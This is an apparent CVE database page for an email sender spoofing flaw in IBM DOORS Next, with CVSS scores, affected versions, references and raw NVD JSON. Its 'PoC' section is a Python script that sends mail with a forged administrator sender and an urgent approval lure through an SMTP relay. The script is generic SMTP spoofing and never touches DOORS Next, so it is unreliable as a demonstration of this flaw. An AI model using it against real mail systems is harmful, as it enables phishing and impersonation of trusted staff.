CVE-2025-2140

Description

IBM Engineering Requirements Management Doors Next 7.0.2, 7.0.3, and 7.1 could allow an authenticated user on the network to spoof email identity of the sender due to improper verification of source data.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.0.2:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.0.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

IBM Engineering Requirements Management DOORS Next 7.0.2

IBM Engineering Requirements Management DOORS Next 7.0.3

IBM Engineering Requirements Management DOORS Next 7.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-2140 - IBM DOORS Next Email Spoofing PoC # This PoC demonstrates the concept of email header injection in DOORS Next # Note: This is a conceptual demonstration for security research purposes only import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart def spoof_email(target_smtp_server, attacker_creds, spoofed_from, real_to, subject, body): """ Demonstrate email spoofing concept exploiting improper source data verification. :param target_smtp_server: DOORS Next internal SMTP relay server :param attacker_creds: Valid authenticated user credentials (low privilege) :param spoofed_from: Email address to spoof (e.g., [email protected]) :param real_to: Actual recipient :param subject: Email subject :param body: Email body content """ # Craft the email message with spoofed sender identity msg = MIMEMultipart() msg['From'] = spoofed_from # Forged sender identity msg['To'] = real_to msg['Subject'] = subject # Attach body msg.attach(MIMEText(body, 'plain')) # Connect to internal SMTP server using attacker's valid credentials try: server = smtplib.SMTP(target_smtp_server, 25) server.starttls() server.login(attacker_creds['user'], attacker_creds['password']) # Send the spoofed email through the trusted internal relay server.sendmail(spoofed_from, real_to, msg.as_string()) server.quit() print(f"[+] Spoofed email sent successfully from: {spoofed_from}") print(f"[+] Delivered to: {real_to}") except Exception as e: print(f"[-] Failed to send spoofed email: {e}") # Example usage (for authorized testing only) if __name__ == "__main__": # Attacker is an authenticated low-privilege user on the internal network attacker_credentials = { 'user': 'lowpriv_user', 'password': 'attacker_password' } # Target the internal DOORS Next SMTP relay smtp_server = "doors-next-smtp.internal.company.com" # Spoof the identity of an administrator spoofed_sender = "[email protected]" # Send to a victim user victim = "[email protected]" spoof_email( target_smtp_server=smtp_server, attacker_creds=attacker_credentials, spoofed_from=spoofed_sender, real_to=victim, subject="Urgent: Requirement Change Approval Required", body="Please review and approve the attached requirement change immediately." )

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-2140
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-2140
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-2140/
[4] VulDB https://vuldb.com/cve/CVE-2025-2140
[5] https://www.ibm.com/support/pages/node/7247716

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-2140", "sourceIdentifier": "[email protected]", "published": "2025-10-12T14:15:36.373", "lastModified": "2025-10-16T14:32:22.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Engineering Requirements Management Doors Next 7.0.2, 7.0.3, and 7.1 could allow an authenticated user on the network to spoof email identity of the sender due to improper verification of source data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "6702EFCC-2FC7-48F3-9356-40033D147332"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "0634040A-046B-4F1D-AD33-7095D68429C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "E44B30C9-5962-4994-A810-B0E04561EDD3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247716", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}